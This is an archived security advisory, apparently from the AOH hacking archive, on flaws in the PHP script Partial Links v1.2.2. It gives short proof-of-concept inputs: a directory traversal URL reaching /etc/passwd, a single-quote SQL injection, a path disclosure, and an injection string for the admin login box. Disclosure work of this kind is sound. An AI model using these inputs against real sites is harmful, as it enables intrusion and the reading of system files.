AOH :: HP Unsorted P :: B06-2748.HTM

Partial links v1.2.2



Partial Links v1.2.2
Partial Links v1.2.2



Partial Links v1.2.2

Homepage:
http://www.particlesoft.net/particlelinks/

Effected files:
index.php
page_footer.php
admin.php

Exploits & Vulnerabilities:

Possible directory traversal?:
http://www.example.com/Other_Sites/X_%2526_Y/../../../../../etc/passwd/

SQL Injection:
http://www.example.com/index.php?topic='

Full path disclosure via page_footer.php:
http://www.example.com/includes/page_footer.php

Fatal error: Call to a member function on a non-object in /home/username/public_html/links/includes/page_footer.php

on line 3

((It should be notedpage_header.php gives full path errors too))

The input form box to login as admin can be spoofed to remove the max char limit allowed and the input data isn't properally sanatized before being generated dynamically too.

For proof of concept try entering the following in the username box:

>'';!--"=&{()}<

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.